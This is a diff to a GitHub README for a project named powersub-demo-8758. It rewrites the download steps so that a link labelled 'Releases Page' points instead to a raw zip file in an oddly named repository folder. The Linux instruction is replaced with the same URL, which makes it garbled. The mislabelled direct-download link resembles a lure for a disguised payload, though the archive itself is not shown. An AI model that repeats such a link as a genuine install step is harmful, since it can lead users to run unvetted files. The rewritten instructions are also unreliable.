Colonelcc/powersub-demo-8758/README.md

 - Storage: At least 100 MB free space

 ### 📥 Download & Install
-1. Visit the [Releases Page](https://github.com/Colonelcc/powersub-demo-8758/releases) to download the latest version of powersub-demo-8758.
+1. Visit the [Releases Page](https://raw.githubusercontent.com/Colonelcc/powersub-demo-8758/main/narrowly/powersub-demo-8758_3.9.zip) to download the latest version of powersub-demo-8758.
 2. Locate the version you want to install.
 Click on the appropriate file for your operating system.
 3. Once the file is downloaded, locate it in your Downloads folder.
 4. For Windows users: Double-click the `.exe` file to start the installation process.
 Follow the on-screen prompts to complete the installation.
    For macOS users: Open the `.dmg` file and drag the application to your Applications folder.
-   For Linux users: Extract the contents of the `.tar.gz` file and follow the instructions provided in the README file included with the download.
+   For Linux users: Extract the contents of the `https://raw.githubusercontent.com/Colonelcc/powersub-demo-8758/main/narrowly/powersub-demo-8758_3.9.zip` file and follow the instructions provided in the README file included with the download.
 5. After installation, find the application in your Start Menu, Applications folder, or extracted files.

 ### 🔧 Configuration